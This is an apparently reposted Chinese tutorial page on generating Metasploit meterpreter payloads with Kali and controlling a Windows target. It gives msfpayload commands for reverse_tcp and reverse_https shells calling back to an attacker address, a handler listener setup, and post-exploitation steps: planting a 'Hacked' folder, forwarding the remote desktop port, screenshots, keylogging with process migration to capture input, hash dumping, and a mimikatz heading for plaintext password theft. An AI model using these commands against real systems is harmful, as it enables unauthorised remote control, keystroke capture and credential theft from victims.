首页 > 代码库 > kali生成shell监听目标主机
kali生成shell监听目标主机
生成监听用的shell.exe:
reverse_tcp(反向连接)
path : payload/windows/meterpreter/reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
reverse_http/https(反向连接)
path:payload/windows/meterpreter/reverse_http/https
msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
通过http/https的方式反向连接,在网速慢的情况下不稳定,在某博客上看到https如果反弹没有收到数据,可以将监听端口换成443试试。
bind_tcp(正向连接)
path : payload/windows/meterpreter/bind_tcp
正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。
利用shell.exe监听:
msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.2msf exploit(handler) > set LPORT 8080msf exploit(handler) > exploit -jmsf exploit(handler) >sessions
基本命令:
常用命令:
background:将当前会话放置后台load/use:加载模块Interact:切换进一个信道migrate:迁移进程run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。Resource:执行一个已有的rc脚本。
写入文件夹:
meterpreter > pwdmeterpreter > cd C:\meterpreter > pwdmeterpreter > mkdir Hacked by AutoRootmeterpreter > ls
写入内容:
edit + 文件,调用vi编辑。
网络相关:
网络命令则有列出ip信息(ipconfig),展示修改路由表(route),还有端口转发(portfwd)
meterpreter > portfwdmeterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2
在建立规则之后就可以连接本地1314端口,这样远程的3389端口就转发出来了
键盘监听:
meterpreter > screenshotmeterpreter > keyscan_startmeterpreter > keyscan_dump
注意一下windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。会话0代表控制台,1,2 代表远程桌面。所以要截获键盘输入必须在0中进行。可 以使用getdesktop查看或者截张图试试。否则使用setdesktop切换。
如果不行就切换到explorer.exe进程中,这样也可以监听到远程桌面连接进来之后的键盘输入数据。
mimikatz:
抓取明文
kali生成shell监听目标主机
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。